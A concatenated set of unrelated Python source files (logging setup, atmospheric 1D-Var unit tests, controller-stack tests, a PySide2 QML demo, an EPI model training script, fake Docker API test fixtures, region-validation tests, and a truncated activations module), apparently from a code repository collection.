"""
Add a file handler to the root logger.
:param Path file_path: log file path
"""
configure({
"handlers": {
file_path.name: {
"class": "logging.FileHandler",
"filename": file_path,
"level": "DEBUG",
"formatter": "detailed",
"mode": 'w'
}
},
"loggers": {
"": {
"handlers": [
file_path.name,
*logging_config["handlers"]
]
}
}
})
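# Example usage (added; illustrative only):
#   configure()                        # console handler at INFO level
#   add_file_handler(Path("run.log"))  # additionally write detailed DEBUG logs to a file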
| 2.359375
| 2
|
source/gui/test/test_1dvar.py
|
bucricket/projectMAScorrection
| 0
|
12777692
|
<reponame>bucricket/projectMAScorrection
'''
Created on May 7, 2014
@author: pascale
'''
import unittest
import rmodel
import logging
import rttovgui_unittest_class
import r1Dvar
class Test(rttovgui_unittest_class.RttovGuiUnitTest):
def setUp(self):
level_logging = logging.DEBUG
self.p = rmodel.project.Project()
logging.basicConfig(filename=(self.p.config.ENV['GUI_WRK_DIR'] +
"/rttovgui_unittest_test_1dvar.log"),
format="[%(asctime)s] %(levelname)s "
"[%(module)s:%(funcName)s:%(lineno)d] %(message)s",
level=level_logging,
datefmt="%Y:%m:%d %H:%M:%S",
filemode="w")
def test_1dvar_backround(self):
filename = "../r1Dvar/data/Sample_Background/BACKGROUND_43L.dat"
PBg = r1Dvar.r1dvar.Background()
PBg.read(filename)
PBg.print_data()
prof = PBg.toProfile()
nlev = prof["NLEVELS"]
        self.assertGreater(prof["P"][10], prof["P"][0], "comparison P")
        self.assertGreater(prof["Q"][nlev - 1], prof["Q"][0], "comparison Q")
PBg.print_data()
print ("-> profile : ")
prof.display()
def test_2profile(self):
print ">>> test_2profile"
p = rmodel.project.Project()
filename = p.config.ENV[
"RTTOV_GUI_PROFILE_DIR"] + "/standard54lev_allgas.H5"
p.openProfile(filename, 1)
nlevels = p.myProfile["NLEVELS"]
pbis = rmodel.project.Project()
pbis.openProfile(filename, 2)
vector = p.myProfile.to1DvarVect()
newprofile = r1Dvar.r1dvar.vector2profile(vector, pbis.myProfile)
vector2 = newprofile.to1DvarVect()
print "vector"
print vector
print "vector2"
print vector2
print "vector-vector2"
print vector - vector2
for i in range(len(vector)):
self.assertEquals(vector[i], vector2[i])
# verify vector2 and vector are not the same memory
vector[:] = 1
for i in range(nlevels):
self.assertNotEqual(newprofile["T"][i], vector[i])
for i in range(nlevels - 29, nlevels):
self.assertNotEqual(newprofile["Q"][i], vector[
nlevels + i - nlevels + 29])
self.assertNotEqual(newprofile["S2M"]["T"], vector[nlevels + 29])
self.assertNotEqual(newprofile["S2M"]["Q"], vector[nlevels + 29 + 1])
self.assertNotEqual(newprofile["SKIN"]["T"], vector[nlevels + 29 + 2])
print "newprofile[Q]"
print newprofile["Q"]
print (newprofile["S2M"]["T"], vector[nlevels + 29])
# verify vector2 and pbis are not the same memory
pbis.myProfile["T"][:] = 2
pbis.myProfile["Q"][:] = 0
pbis.myProfile["S2M"]["T"] = 0
pbis.myProfile["S2M"]["Q"] = 0
pbis.myProfile["SKIN"]["T"] = 0
for i in range(nlevels):
self.assertNotEqual(newprofile["T"][i], pbis.myProfile["T"][i])
for i in range(nlevels):
self.assertNotEqual(newprofile["Q"][i], pbis.myProfile["Q"][i])
self.assertNotEqual(newprofile["S2M"]["T"], pbis.myProfile["S2M"]["T"])
self.assertNotEqual(newprofile["S2M"]["Q"], pbis.myProfile["S2M"]["Q"])
self.assertNotEqual(newprofile["SKIN"][
"T"], pbis.myProfile["SKIN"]["T"])
def test_2vector(self):
print (">>> test_2vector")
print (" a vector contains only T values, lnq bottom lnq vales ,"
" Tsurf, lnq surf and Tskin")
print (" temperature, and ln q are stored"
" from top of atmosphere to ground ")
p = rmodel.project.Project()
filename = p.config.ENV[
"RTTOV_GUI_PROFILE_DIR"] + "/standard54lev_allgas.H5"
p.openProfile(filename, 1)
vector = p.myProfile.to1DvarVect()
print ("T:")
print (p.myProfile["T"])
print ("Q:")
print (p.myProfile["Q"])
print (p.myProfile["S2M"]["T"])
print (p.myProfile["S2M"]["Q"])
print (p.myProfile["SKIN"]["T"])
print ('vector')
print(vector)
nlevels = p.myProfile["NLEVELS"]
self.assertEqual(vector[0], p.myProfile["T"][0])
self.assertEqual(vector[nlevels - 1], p.myProfile["T"][nlevels - 1])
self.assertEqual(vector[nlevels + 29 - 1],
p.myProfile["Q"][nlevels - 1])
self.assertEqual(vector[nlevels], p.myProfile["Q"][nlevels - 29])
# verify p.myProfile and vector are not linked
p.myProfile["T"][0] = -1
p.myProfile["Q"][nlevels - 1] = -1
self.assertNotEqual(vector[0], p.myProfile["T"][0])
self.assertNotEqual(vector[nlevels + 29 - 1],
p.myProfile["Q"][nlevels - 1])
def test_1dvar_Rmatrices(self):
print (">>> test_1dvar_Rmatrices")
# test Rmatrices
rmatrixfilename = "../r1Dvar/data/IASI_COEFFS_DIR/Rmatrix_orig"
print ("rmatrixfilename")
R = r1Dvar.r1dvar.Rmatrix()
R.read(rmatrixfilename)
# TODO add assertions
# R.plot_matrix()
def test_1dvar_Bmatrices(self):
print (">>> test_1dvar_Bmatrices")
filename = "../r1Dvar/data/Sample_Bmatrices/Bmatrix_43L"
B = r1Dvar.r1dvar.Bmatrix()
B.read_matrices(filename)
# TODO add assertions
if __name__ == "__main__":
unittest.main()
| 2.09375
| 2
|
Test/test_others.py
|
LinyueSong/FMLC
| 0
|
12777693
|
<filename>Test/test_others.py
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import time
from FMLC.triggering import triggering
from FMLC.baseclasses import eFMU
from FMLC.stackedclasses import controller_stack
class testcontroller1(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init= False
self.output['c'] = self.input['a'] * self.input['b']
return 'testcontroller1 did a computation!'
class testcontroller2(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(0.2)
return 'testcontroller2 did a computation!'
class testcontroller3(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(1)
return 'testcontroller3 did a computation!'
class testcontroller4(eFMU):
def __init__(self):
self.input = {'a': None, 'b': None}
self.output = {'c': None}
self.init = True
def compute(self):
self.init = False
self.output['c'] = self.input['a'] * self.input['b']
time.sleep(10)
return 'testcontroller4 did a computation!'
def test_input_errors():
##CASE1: not all inputs are set.
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
controller['mpc1'] = {'fun':testcontroller2, 'sampletime':'forecast1'}
controller['control1'] = {'fun':testcontroller1, 'sampletime':'mpc1'}
controller['forecast2'] = {'fun':testcontroller3, 'sampletime':0}
controller['forecast3'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
mapping['forecast2_a'] = 20
mapping['forecast2_b'] = 4
mapping['forecast3_a'] = 30
mapping['forecast3_b'] = 4
mapping['mpc1_b'] = 'forecast1_a'
mapping['control1_a'] = 'mpc1_c'
try:
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
        raise AssertionError("controller_stack should have raised KeyError")
except KeyError as e:
assert 'mapping' in str(e)
except:
        raise
##CASE1: not all given inputs are valid inputs (extra inputs)
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
controller['mpc1'] = {'fun':testcontroller2, 'sampletime':'forecast1'}
controller['control1'] = {'fun':testcontroller1, 'sampletime':'mpc1'}
controller['forecast2'] = {'fun':testcontroller3, 'sampletime':0}
controller['forecast3'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_d'] = 10
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
mapping['forecast2_a'] = 20
mapping['forecast2_b'] = 4
mapping['forecast3_a'] = 30
mapping['forecast3_b'] = 4
mapping['mpc1_a'] = 'forecast1_c'
mapping['mpc1_b'] = 'forecast1_a'
mapping['control1_a'] = 'mpc1_c'
mapping['control1_b'] = 'mpc1_a'
try:
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
        raise AssertionError("controller_stack should have raised KeyError")
except KeyError as e:
assert 'parameter' in str(e)
except:
        raise
def test_init_once():
controller = {}
controller['forecast1'] = {'fun':testcontroller1, 'sampletime':0}
mapping = {}
mapping['forecast1_a'] = 10
mapping['forecast1_b'] = 4
controller = controller_stack(controller, mapping, tz=-8, debug=True, parallel=True, timeout=2)
obj = controller.controller_objects['forecast1']
for i in range(3):
controller.query_control(time.time())
assert controller.controller_objects['forecast1'] is obj
| 2.6875
| 3
|
projects/pyside2_qml_property/main.py
|
jungmonster/qt_study_project
| 0
|
12777694
|
import sys
from PySide2.QtGui import QGuiApplication
from PySide2.QtQml import QQmlApplicationEngine
from PySide2.QtCore import QUrl
from PySide2.QtCore import QCoreApplication
from PySide2.QtCore import QObject, Signal, Slot, Property
class Number(QObject):
__val = 0
@Signal
def numberChanged(self):
pass
@Slot(int)
def set_number(self, val):
print("setter func")
self.__val = val
self.numberChanged.emit()
def get_number(self):
print("getter func")
return self.__val
ValueNumber = Property(int, get_number, set_number, notify=numberChanged)
if __name__ == '__main__':
app = QGuiApplication(sys.argv)
engine = QQmlApplicationEngine()
number = Number()
engine.rootContext().setContextProperty("numberVal", number)
engine.load(QUrl("./main.qml"))
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
| 2.375
| 2
|
src/train_validate.py
|
biomed-AI/TransEPI
| 3
|
12777695
|
#!/usr/bin/env python3
import argparse, os, sys, time, shutil, tqdm
import warnings, json, gzip
import numpy as np
import copy
from sklearn.model_selection import GroupKFold
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader, Subset
import epi_models
import epi_dataset
import misc_utils
import functools
print = functools.partial(print, flush=True)
def split_train_valid_test(groups, train_keys, valid_keys, test_keys=None):
"""
groups: length N, the number of samples
train
"""
assert isinstance(train_keys, list)
assert isinstance(valid_keys, list)
assert test_keys is None or isinstance(test_keys, list)
index = np.arange(len(groups))
train_idx = index[np.isin(groups, train_keys)]
valid_idx = index[np.isin(groups, valid_keys)]
if test_keys is not None:
test_idx = index[np.isin(groups, test_keys)]
return train_idx, valid_idx, test_idx
else:
return train_idx, valid_idx
def make_directory(in_dir):
if os.path.isfile(in_dir):
warnings.warn("{} is a regular file".format(in_dir))
return None
outdir = in_dir.rstrip('/')
if not os.path.isdir(outdir):
os.makedirs(outdir)
return outdir
def model_summary(model):
"""
model: pytorch model
"""
import torch
total_param = 0
trainable_param = 0
for i, p in enumerate(model.parameters()):
num_p = torch.numel(p)
if p.requires_grad:
trainable_param += num_p
total_param += num_p
return {'total_param': total_param, 'trainable_param': trainable_param}
def predict(model: nn.Module, data_loader: DataLoader, device=torch.device('cuda')):
model.eval()
result, true_label = None, None
for feats, _, enh_idxs, prom_idxs, labels in data_loader:
feats, labels = feats.to(device), labels.to(device)
# enh_idxs, prom_idxs = enh_idxs.to(device), prom_idxs.to(device)
pred = model(feats, enh_idx=enh_idxs, prom_idx=prom_idxs)
pred = pred.detach().cpu().numpy()
labels = labels.detach().cpu().numpy()
if result is None:
result = pred
true_label = labels
else:
result = np.concatenate((result, pred), axis=0)
true_label = np.concatenate((true_label, labels), axis=0)
return (result.squeeze(), true_label.squeeze())
def train_validate_test(
model, optimizer,
train_loader, valid_loader, test_loader,
num_epoch, patience, outdir,
checkpoint_prefix, device, use_scheduler=False) -> nn.Module:
bce_loss = nn.BCELoss()
mse_loss = nn.MSELoss()
wait = 0
best_epoch, best_val_auc, best_val_aupr = -1, -1, -1
if use_scheduler:
scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer, T_0=5, T_mult=2)
for epoch_idx in range(num_epoch):
model.train()
for feats, dists, enh_idxs, prom_idxs, labels in tqdm.tqdm(train_loader):
feats, dists, labels = feats.to(device), dists.to(device), labels.to(device)
if hasattr(model, "att_C"):
pred, pred_dists, att = model(feats, enh_idxs, prom_idxs, return_att=True)
attT = att.transpose(1, 2)
identity = torch.eye(att.size(1)).to(device)
identity = Variable(identity.unsqueeze(0).expand(labels.size(0), att.size(1), att.size(1)))
penal = model.l2_matrix_norm(torch.matmul(att, attT) - identity)
loss = bce_loss(pred, labels) + (model.att_C * penal / labels.size(0)).type(torch.cuda.FloatTensor) + mse_loss(dists, pred_dists)
del penal, identity
else:
pred = model(feats, dists)
loss = bce_loss(pred, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if use_scheduler:
scheduler.step()
model.eval()
valid_pred, valid_true = predict(model, valid_loader)
val_AUC, val_AUPR = misc_utils.evaluator(valid_true, valid_pred, out_keys=["AUC", "AUPR"])
print("\nvalid_result({})\t{:.4f}\t{:.4f}\t({})".format(epoch_idx, val_AUC, val_AUPR, time.asctime()))
if val_AUC + val_AUPR > best_val_auc + best_val_aupr:
wait = 0
best_epoch, best_val_auc, best_val_aupr = epoch_idx, val_AUC, val_AUPR
test_pred, test_true = predict(model, test_loader)
np.savetxt(
"{}/test_result.{}.txt.gz".format(outdir, epoch_idx),
X=np.concatenate((test_pred.reshape(-1, 1), test_true.reshape(-1, 1)), axis=1),
fmt="%.5f",
delimiter='\t'
)
test_AUC, test_AUPR = misc_utils.evaluator(test_true, test_pred, out_keys=["AUC", "AUPR"])
print("Test_result\t{:.4f}\t{:.4f}\t({})".format(test_AUC, test_AUPR, time.asctime()))
if use_scheduler:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
torch.save({
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict()
}, "{}/checkpoint.{}.pt".format(outdir, epoch_idx))
else:
wait += 1
if wait >= patience:
print("Early stopped ({})".format(time.asctime()))
print("Best epoch/AUC/AUPR: {}\t{:.4f}\t{:.4f}".format(best_epoch, best_val_auc, best_val_aupr))
break
else:
print("Wait{} ({})".format(wait, time.asctime()))
def get_args():
p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument(
'--train',
required=True,
nargs='+'
)
p.add_argument(
'--valid',
required=True,
nargs='+'
)
p.add_argument(
"--test",
nargs='+',
default=None,
help="Optional test set"
)
p.add_argument('-b', "--batch-size", type=int, default=256)
p.add_argument('-c', "--config", required=True)
p.add_argument('-o', "--outdir", required=True)
p.add_argument("--threads", default=32, type=int)
    p.add_argument('--seed', type=int, default=2020)
    # The three options below are referenced in __main__ but were missing from the
    # parser; the defaults are assumptions and may need adjusting.
    p.add_argument("--gpu", type=int, default=0, help="GPU id (-1 for CPU)")
    p.add_argument("--use-reverse", dest="use_reverse", action="store_true")
    p.add_argument("--aug-num", dest="aug_num", type=int, default=1)
    return p
if __name__ == "__main__":
p = get_args()
args = p.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
config = json.load(open(args.config))
# all_data = epi_dataset.EPIDataset(**config["data_opts"])
train_config = config.copy()
train_config["data_opts"]["datasets"] = args.train
train_config["data_opts"]["use_reverse"] = args.use_reverse
train_config["data_opts"]["max_aug"] = args.aug_num
train_data = epi_dataset.EPIDataset(
**train_config["data_opts"]
)
train_loader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True, num_workers=args.threads)
if args.test is None:
valid_test_config = copy.deepcopy(config)
valid_test_config["data_opts"]["datasets"] = args.valid
valid_test_data = epi_dataset.EPIDataset(
**valid_test_config["data_opts"]
)
valid_idx, test_idx = split_train_valid_test(
np.array(valid_test_data.metainfo["chrom"]),
train_keys=["chr{}".format(i).replace("23", "X") for i in range(1, 24, 2)],
valid_keys=["chr{}".format(i) for i in range(2, 22, 2)]
)
valid_data = Subset(valid_test_data, indices=valid_idx)
test_data = Subset(valid_test_data, indices=test_idx)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)
else:
valid_config = copy.deepcopy(config)
valid_config["data_opts"]["datasets"] = args.valid
valid_data = epi_dataset.EPIDataset(
**valid_config["data_opts"]
)
valid_loader = DataLoader(valid_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
test_config = copy.deepcopy(config)
test_config["data_opts"]["datasets"] = args.test
test_data = epi_dataset.EPIDataset(
**test_config["data_opts"]
)
test_loader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False, num_workers=args.threads)
config["model_opts"]["in_dim"] = train_data.feat_dim
config["model_opts"]["seq_len"] = config["data_opts"]["seq_len"] // config["data_opts"]["bin_size"]
print("##{}".format(time.asctime()))
print("##command: {}".format(' '.join(sys.argv)))
print("##args: {}".format(args))
print("##config: {}".format(config))
print("##sample size: {}".format(len(train_data)))
print("## feature size: {}".format([v.size() for v in train_data.__getitem__(0)]))
if args.gpu == -1:
device = "cpu"
else:
        os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
device = "cuda"
device = torch.device(device)
model_class = getattr(epi_models, config["model_opts"]["model"])
model = model_class(**config["model_opts"]).to(device)
optimizer_params = {'lr': config["train_opts"]["learning_rate"], 'weight_decay': 0}
optimizer = torch.optim.Adam(model.parameters(), **optimizer_params)
print(model)
print(model_summary(model))
print(optimizer)
if not os.path.isdir(args.outdir):
args.outdir = make_directory(args.outdir)
train_validate_test(
model,
optimizer,
train_loader, valid_loader, test_loader,
num_epoch=config["train_opts"]["num_epoch"],
patience=config["train_opts"]["patience"],
outdir=args.outdir,
checkpoint_prefix="checkpoint",
device=device,
use_scheduler=config["train_opts"]["use_scheduler"]
)
| 2.21875
| 2
|
tests/fakes/fake_docker_api.py
|
delta/serverctl_daemon
| 2
|
12777696
|
<reponame>delta/serverctl_daemon
"""
Fake responses for the Docker API
Adapted from https://github.com/docker/docker-py/blob/master/tests/unit/fake_api.py
"""
from typing import Any, Generator
FAKE_CONTAINER_ID = "3cc2351ab11b"
FAKE_LONG_ID = "e75ccd38cba33f61b09515e05f56fc243ef40186d600a9eeb6bc0bed8e2e1508"
FAKE_LOG_LINE_CONTENT = b"fake log"
FAKE_LOG_LINE_COUNT = 10
FAKE_IMAGE_ID = "sha256:e9aa60c60128"
FAKE_TAG = "sha256:e9aafierojv"
FAKE_CONTAINER_NAME = "jolly_black"
FAKE_LOGS_MESSAGE = 'Hello World\nThis is test logs'
def get_fake_containers() -> tuple[int, list[dict[str, str]]]:
"""Get list of fake containers"""
status_code = 200
response = [{
"Id": FAKE_CONTAINER_ID,
"Image": "busybox:latest",
"Created": "2 days ago",
"Command": "true",
"Status": "fake status"
}]
return status_code, response
def get_fake_inspect_container() -> tuple[int, dict[str, Any]]:
"""Get fake inspect data"""
status_code = 200
response = {
"Id": FAKE_CONTAINER_ID,
"Created": "2021-09-28T14:16:51.246200393Z",
"Path": "/docker-entrypoint.sh",
"Args": [
"apache2-foreground"
],
"State": {
"Status": "running",
"Running": True,
"Paused": False,
"Restarting": False,
"OOMKilled": False,
"Dead": False,
"Pid": 85110,
"ExitCode": 0,
"Error": "",
"StartedAt": "2021-09-28T14:16:51.540023895Z",
"FinishedAt": "0001-01-01T00:00:00Z"
},
"Image": FAKE_IMAGE_ID,
"Name": f"/{FAKE_CONTAINER_NAME}",
"RestartCount": 0,
"Driver": "overlay2",
"Platform": "linux",
"MountLabel": "",
"ProcessLabel": "",
"AppArmorProfile": "docker-default",
"ExecIDs": None,
"HostConfig": {
"Binds": None,
"ContainerIDFile": "",
"LogConfig": {
"Type": "json-file",
"Config": {}
},
"NetworkMode": "default",
"PortBindings": {
"80/tcp": [
{
"HostIp": "",
"HostPort": "8088"
}
]
},
"RestartPolicy": {
"Name": "no",
"MaximumRetryCount": 0
},
"AutoRemove": False,
"VolumeDriver": "",
"VolumesFrom": None,
"CapAdd": None,
"CapDrop": None,
"CgroupnsMode": "host",
"Dns": [],
"DnsOptions": [],
"DnsSearch": [],
"ExtraHosts": None,
"GroupAdd": None,
"IpcMode": "private",
"Cgroup": "",
"Links": None,
"OomScoreAdj": 0,
"PidMode": "",
"Privileged": False,
"PublishAllPorts": False,
"ReadonlyRootfs": False,
"SecurityOpt": None,
"UTSMode": "",
"UsernsMode": "",
"ShmSize": 67108864,
"Runtime": "runc",
"ConsoleSize": [
0,
0
],
"Isolation": "",
"CpuShares": 0,
"Memory": 0,
"NanoCpus": 0,
"CgroupParent": "",
"BlkioWeight": 0,
"BlkioWeightDevice": [],
"BlkioDeviceReadBps": None,
"BlkioDeviceWriteBps": None,
"BlkioDeviceReadIOps": None,
"BlkioDeviceWriteIOps": None,
"CpuPeriod": 0,
"CpuQuota": 0,
"CpuRealtimePeriod": 0,
"CpuRealtimeRuntime": 0,
"CpusetCpus": "",
"CpusetMems": "",
"Devices": [],
"DeviceCgroupRules": None,
"DeviceRequests": None,
"KernelMemory": 0,
"KernelMemoryTCP": 0,
"MemoryReservation": 0,
"MemorySwap": 0,
"MemorySwappiness": None,
"OomKillDisable": False,
"PidsLimit": None,
"Ulimits": None,
"CpuCount": 0,
"CpuPercent": 0,
"IOMaximumIOps": 0,
"IOMaximumBandwidth": 0,
"MaskedPaths": [
"/proc/asound",
"/proc/acpi",
"/proc/kcore",
"/proc/keys",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/timer_stats",
"/proc/sched_debug",
"/proc/scsi",
"/sys/firmware"
],
"ReadonlyPaths": [
"/proc/bus",
"/proc/fs",
"/proc/irq",
"/proc/sys",
"/proc/sysrq-trigger"
]
},
"Mounts": [],
"Config": {
"Hostname": "03bfd76552c2",
"Domainname": "",
"User": "",
"AttachStdin": True,
"AttachStdout": True,
"AttachStderr": True,
"ExposedPorts": {
"80/tcp": {}
},
"Tty": True,
"OpenStdin": True,
"StdinOnce": True,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PHP_INI_DIR=/usr/local/etc/php",
],
"Cmd": [
"apache2-foreground"
],
"Image": "phpmyadmin:latest",
"Volumes": None,
"WorkingDir": "/var/www/html",
"Entrypoint": [
"/docker-entrypoint.sh"
],
"OnBuild": None,
"StopSignal": "SIGWINCH"
},
"NetworkSettings": {
"Bridge": "",
"SandboxID": "c5cec0eaeadea649b43ea0fb6cec5b60cb3c7b1b06813a1f07e6b7f4e2cb180e",
"HairpinMode": False,
"LinkLocalIPv6Address": "",
"LinkLocalIPv6PrefixLen": 0,
"Ports": {
"80/tcp": [
{
"HostIp": "0.0.0.0",
"HostPort": "8088"
},
{
"HostIp": "::",
"HostPort": "8088"
}
]
},
"SandboxKey": "/var/run/docker/netns/c5cec0eaeade",
"SecondaryIPAddresses": None,
"SecondaryIPv6Addresses": None,
"EndpointID": "0ec86c835121720138dad365e7ad4c5520882801494a971932194f1dd3baee8b",
"Gateway": "172.17.0.1",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"IPAddress": "172.17.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"MacAddress": "02:42:ac:11:00:02",
"Networks": {
"bridge": {
"IPAMConfig": None,
"Links": None,
"Aliases": None,
"NetworkID": FAKE_LONG_ID,
"EndpointID": FAKE_LONG_ID,
"Gateway": "172.17.0.1",
"IPAddress": "172.17.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"MacAddress": "02:42:ac:11:00:02",
"DriverOpts": None
}
}
}
}
return status_code, response
def get_fake_inspect_image() -> tuple[int, dict[str, Any]]:
"Fake inspect image"
status_code = 200
response = {
'Id': FAKE_IMAGE_ID,
'Parent': "27cf784147099545",
'Created': "2013-03-23T22:24:18.818426-07:00",
'Container': FAKE_CONTAINER_ID,
'Config': {'Labels': {'bar': 'foo'}},
'ContainerConfig':
{
"Hostname": "",
"User": "",
"Memory": 0,
"MemorySwap": 0,
"AttachStdin": False,
"AttachStdout": False,
"AttachStderr": False,
"PortSpecs": "",
"Tty": True,
"OpenStdin": True,
"StdinOnce": False,
"Env": "",
"Cmd": ["/bin/bash"],
"Dns": "",
"Image": "base",
"Volumes": "",
"VolumesFrom": "",
"WorkingDir": ""
},
'Size': 6823592
}
return status_code, response
def get_fake_images() -> tuple[int, list[dict[str, Any]]]:
"Fake list images"
status_code = 200
response = [{
'Id': FAKE_IMAGE_ID,
'Created': '2 days ago',
'Repository': 'busybox',
'RepoTags': ['busybox:latest', 'busybox:1.0'],
}]
return status_code, response
def get_fake_prune_containers() -> tuple[int, dict[str, Any]]:
"""Get fake prune containers response"""
status_code = 200
response = {
"ContainersDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_images() -> tuple[int, dict[str, Any]]:
"""Get fake prune images response"""
status_code = 200
response = {
"ImagesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_volumes() -> tuple[int, dict[str, Any]]:
"""Get fake prune volumes response"""
status_code = 200
response = {
"VolumesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def get_fake_prune_networks() -> tuple[int, dict[str, Any]]:
"""Get fake prune networks response"""
status_code = 200
response = {
"NetworksDeleted": [FAKE_LONG_ID]
}
return status_code, response
def get_fake_prune_builds() -> tuple[int, dict[str, Any]]:
"""Get fake prune build caches response"""
status_code = 200
response = {
"CachesDeleted": [FAKE_LONG_ID],
"SpaceReclaimed": 123
}
return status_code, response
def _get_log_stream() -> Generator[bytes, None, None]:
for _ in range(FAKE_LOG_LINE_COUNT):
yield FAKE_LOG_LINE_CONTENT
def get_fake_logs() -> tuple[int, Generator[bytes, None, None]]:
"""Get fake container logs"""
status_code = 200
return status_code, _get_log_stream()
def get_fake_logs_response() -> tuple[int, bytes]:
"""Get fake logs response"""
status_code = 200
response = (bytes(FAKE_LOGS_MESSAGE, 'ascii'))
return status_code, response
| 2.28125
| 2
|
app/test/test_data_validation.py
|
adrianopaduam/python_flask_selenium_stock_price_api
| 0
|
12777697
|
import unittest
from app.main.util.data_validation import validate_region_name
class TestCorrectRegionValidation(unittest.TestCase):
def test_correct_region_validation(self):
correct_region_simple = "Argentina"
correct_region_with_spaces = "United%20Kingdom"
correct_region_with_hiphen = "timor-leste"
self.assertTupleEqual(
(True, "Argentina", None),
validate_region_name(correct_region_simple)
)
self.assertTupleEqual(
(True, "United Kingdom", None),
validate_region_name(correct_region_with_spaces)
)
self.assertTupleEqual(
(True, "timor-leste", None),
validate_region_name(correct_region_with_hiphen)
)
class TestIncorrectRegionValidation(unittest.TestCase):
def test_incorrect_region_validation(self):
no_region_informed = None
empty_region = ""
region_with_number = "timor-leste123456"
self.assertTupleEqual(
(False, None, "'region' parameter must be informed"),
validate_region_name(no_region_informed)
)
self.assertTupleEqual(
(
False,
"",
" ".join([
"'region' must be a non-empty string",
"containing a valid country name",
"(letters, whitespaces and hiphen only)"
])
),
validate_region_name(empty_region)
)
self.assertTupleEqual(
(
False,
"timor-leste123456",
" ".join([
"'region' must be a non-empty string",
"containing a valid country name",
"(letters, whitespaces and hiphen only)"
])
),
validate_region_name(region_with_number)
)
if __name__ == '__main__':
unittest.main()
| 3.484375
| 3
|
tensormonk/activations/activations.py
|
Tensor46/TensorMONK
| 29
|
12777698
|
""" TensorMONK :: layers :: Activations """
__all__ = ["Activations"]
import torch
import torch.nn as nn
import torch.nn.functional as F
def maxout(tensor: torch.Tensor) -> torch.Tensor:
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by n_splits"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
class Activations(nn.Module):
r"""Activation functions. Additional activation functions (other than those
available in pytorch) are
:obj:`"hsigm"` & :obj:`"hswish"` (`"Searching for MobileNetV3"
<https://arxiv.org/pdf/1905.02244>`_),
:obj:`"maxo"` (`"Maxout Networks" <https://arxiv.org/pdf/1302.4389>`_),
:obj:`"mish"` (`"Mish: A Self Regularized Non-Monotonic Neural Activation
Function" <https://arxiv.org/pdf/1908.08681v1>`_),
:obj:`"squash"` (`"Dynamic Routing Between Capsules"
<https://arxiv.org/abs/1710.09829>`_) and
:obj:`"swish"` (`"SWISH: A Self-Gated Activation Function"
<https://arxiv.org/pdf/1710.05941v1>`_).
Args:
tensor_size (tuple, required): Input tensor shape in BCHW
(None/any integer >0, channels, height, width).
activation (str, optional): The list of activation options are
:obj:`"elu"`, :obj:`"gelu"`, :obj:`"hsigm"`, :obj:`"hswish"`,
:obj:`"lklu"`, :obj:`"maxo"`, :obj:`"mish"`, :obj:`"prelu"`,
:obj:`"relu"`, :obj:`"relu6"`, :obj:`"rmxo"`, :obj:`"selu"`,
:obj:`"sigm"`, :obj:`"squash"`, :obj:`"swish"`, :obj:`"tanh"`.
(default: :obj:`"relu"`)
elu_alpha (float, optional): (default: :obj:`1.0`)
lklu_negslope (float, optional): (default: :obj:`0.01`)
.. code-block:: python
import torch
import tensormonk
print(tensormonk.activations.Activations.METHODS)
tensor_size = (None, 16, 4, 4)
activation = "maxo"
maxout = tensormonk.activations.Activations(tensor_size, activation)
maxout(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16, 4)
activation = "squash"
squash = tensormonk.activations.Activations(tensor_size, activation)
squash(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16)
activation = "swish"
swish = tensormonk.activations.Activations(tensor_size, activation)
swish(torch.randn(1, *tensor_size[1:]))
"""
METHODS = ["elu", "gelu", "hsigm", "hswish", "lklu", "maxo", "mish",
"prelu", "relu", "relu6", "rmxo",
